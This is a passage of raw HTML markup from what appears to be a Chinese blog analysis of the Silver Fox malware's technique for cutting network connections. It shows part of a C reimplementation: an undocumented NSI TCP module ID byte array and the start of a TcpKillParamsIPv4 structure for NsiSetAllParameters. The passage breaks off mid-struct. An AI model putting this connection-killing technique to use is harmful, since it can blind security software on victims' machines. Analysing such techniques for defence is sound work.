Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x03, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x4A, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0xEB, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x1A, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x9B, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0xD4, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x11, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x91, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x23, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x50, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x04, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x77, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x59, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0xBC</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">正当我准备苦逼的手搓时发现已经有前辈走在前面，再仔细一看，Emmmm以前看过只是失去了记忆。</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">实现如下：</span></span></span></p><p style="mso-style-name: &#39;Source Code&#39;;margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;word-break: break-all;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ImportTok&#39;;color: #008000;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><windows.h></windows.h></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#pragma comment(lib, &#34;iphlpapi.lib&#34;)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#pragma comment(lib, &#34;ws2_32.lib&#34;)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#pragma comment(lib, &#34;Psapi.lib&#34;)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Undocumented TCP module ID for NSI (24 bytes)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">BYTE NPI_MS_TCP_MODULEID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[]</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x18, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x01, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x03, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x4A, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0xEB, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x1A, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x9B, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0xD4, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x11,            </span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x91, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x23, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x00, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x50, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x04, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x77, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x59, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0xBC</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Structure expected by NsiSetAllParameters to represent a TCP socket</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">struct</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> TcpKillParamsIPv4 </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">WORD</span><span style="mso-spacerun:yes;"><span leaf="">  </span></span><span leaf="">localAddrFamily</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">WORD</span><span style="mso-spacerun:yes;"><span leaf="">  </span></span><span leaf="">localPort</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span 